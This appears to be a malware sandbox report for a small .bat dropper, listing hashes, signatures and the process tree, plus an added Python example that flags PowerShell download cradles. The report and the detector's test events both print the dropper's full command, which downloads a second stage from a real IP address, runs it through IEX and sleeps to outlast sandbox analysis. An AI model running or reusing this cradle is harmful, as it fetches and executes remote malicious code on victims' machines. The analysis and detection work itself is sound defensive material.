Analysis
max time kernel: 63s
max time network: 63s
platform: windows7_x64
resource: win7
submitted: 12-07-2020 22:10
Static task: static1
Behavioral task: behavioral1
  Sample: f012b64a4c409c683d9fb217954bb81e.bat
  Resource: win7 (windows7_x64)
  0 signatures, 0 seconds
Behavioral task: behavioral2
  Sample: f012b64a4c409c683d9fb217954bb81e.bat
  Resource: win10v200430 (windows10_x64)
  0 signatures, 0 seconds
General
Target: f012b64a4c409c683d9fb217954bb81e.bat
Size: 220B
MD5: 3630e6bfeceaf5ae9f0fe776b8146e0b
SHA1: 233dfd6ce74130dd5c4fea4cfde910b51544c5fd
SHA256: 4af01116ea53d684aab434e8d65d4fd28822df7f13ada9a7a0a80c8f188fdf9e
SHA512: 677811903d0bb197ccd3a66b02c1b5c14cd9956cc7668fa8ead565b25941ba3531bc00b6aebbdfc8a3a600bd318f0c1e5fe80c7f421243c6f3c068f81b7ef62a
Score: 10/10
Malware Config
Extracted
Language: ps1
Source:
URLs:
  ps1.dropper  http://185.103.242.78/pastes/f012b64a4c409c683d9fb217954bb81e
Signatures

Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes:
  description              pid   process
  Token: SeDebugPrivilege  1400  powershell.exe

Suspicious behavior: EnumeratesProcesses (2 IoCs)
Processes:
  pid   process
  1400  powershell.exe
  1400  powershell.exe

Blacklisted process makes network request (1 IoC)
Processes:
  flow  pid   process
  3     1400  powershell.exe

Suspicious use of WriteProcessMemory (4 IoCs)
Processes:
  description                       pid   process  target process
  PID 1108 wrote to memory of 1400  1108  cmd.exe  powershell.exe
  PID 1108 wrote to memory of 1400  1108  cmd.exe  powershell.exe
  PID 1108 wrote to memory of 1400  1108  cmd.exe  powershell.exe
  PID 1108 wrote to memory of 1400  1108  cmd.exe  powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
Processes:
  pid   process
  1400  powershell.exe
Processes

C:\Windows\system32\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\f012b64a4c409c683d9fb217954bb81e.bat"
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (child of cmd.exe above)
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/f012b64a4c409c683d9fb217954bb81e');Invoke-CSLQTFNOIPZFU;Start-Sleep -s 10000"
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
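The process tree is the whole story of this 220-byte .bat: cmd.exe hands off to the 32-bit (SysWOW64) PowerShell with a one-line download cradle that fetches a second stage with WebClient.DownloadString, runs it through IEX, calls a function the downloaded script defines (Invoke-CSLQTFNOIPZFU), and then sleeps for 10000 seconds, far longer than the 63-second analysis window. The following is an added detection example, not part of the sandbox report or any vendor's signature code: it scores process-creation events for that cradle pattern and pulls out the second-stage URL. The events are constructed to mirror the tree above; the event schema (pid, ppid, parent_image, image, command_line), the explorer.exe parent of cmd.exe, and the benign third event are assumptions for the example.

```python
"""
Added example: flag PowerShell download cradles in process-creation events.
Not part of the sandbox report; the ProcEvent schema is an assumption.
"""
import re
from dataclasses import dataclass, field

# Indicators matched against the full command line (case-insensitive).
CRADLE_PATTERNS = [
    ("iex", re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    ("webclient_download", re.compile(r"net\.webclient.*download(string|data|file)", re.I)),
    # Sleeping for thousands of seconds outlives most sandbox runs.
    ("long_sleep", re.compile(r"start-sleep\s+-s(?:econds)?\s+(\d{4,})", re.I)),
]
URL_RE = re.compile(r"https?://[^\s'\"();]+", re.I)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    parent_image: str
    image: str
    command_line: str


@dataclass
class Verdict:
    pid: int
    indicators: list = field(default_factory=list)
    urls: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # The cradle proper is IEX fed by a WebClient download; the other
        # indicators only add context and never flag on their own.
        return "iex" in self.indicators and "webclient_download" in self.indicators


def extract_urls(command_line: str) -> list:
    """Return every http(s) URL in a command line (the second-stage source)."""
    return URL_RE.findall(command_line)


def score_event(ev: ProcEvent) -> Verdict:
    """Score one process-creation event; only PowerShell images are inspected."""
    v = Verdict(pid=ev.pid, urls=extract_urls(ev.command_line))
    image = ev.image.lower()
    if not image.endswith("\\powershell.exe"):
        return v
    for name, rx in CRADLE_PATTERNS:
        if rx.search(ev.command_line):
            v.indicators.append(name)
    # A .bat dropper reaches PowerShell through cmd.exe, as in this report.
    if ev.parent_image.lower().endswith("\\cmd.exe"):
        v.indicators.append("parent_cmd")
    # 32-bit PowerShell on a 64-bit host is unusual for interactive use.
    if "\\syswow64\\" in image:
        v.indicators.append("wow64_powershell")
    return v


def find_cradles(events) -> list:
    """Return the verdicts for events that carry the download cradle."""
    return [v for v in map(score_event, events) if v.suspicious]


# Constructed events mirroring the report's process tree (explorer.exe as
# the parent of cmd.exe and the third, benign event are assumptions).
EVENTS = [
    ProcEvent(1108, 900, r"C:\Windows\explorer.exe", r"C:\Windows\system32\cmd.exe",
              r'cmd /c "C:\Users\Admin\AppData\Local\Temp\f012b64a4c409c683d9fb217954bb81e.bat"'),
    ProcEvent(1400, 1108, r"C:\Windows\system32\cmd.exe",
              r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'''C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/f012b64a4c409c683d9fb217954bb81e');Invoke-CSLQTFNOIPZFU;Start-Sleep -s 10000"'''),
    ProcEvent(2200, 1108, r"C:\Windows\system32\cmd.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\setup.ps1"),
]

if __name__ == "__main__":
    for v in find_cradles(EVENTS):
        print(f"pid {v.pid}: {', '.join(v.indicators)}; urls={v.urls}")
```

Only the combination of IEX and a WebClient download flags an event; a cmd.exe parent or the SysWOW64 path alone (as in the constructed setup.ps1 event) produces indicators but no verdict, which keeps the rule usable on hosts where batch files legitimately call PowerShell.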
Network
MITRE ATT&CK Matrix
Downloads
memory/1400-0-0x0000000000000000-mapping.dmp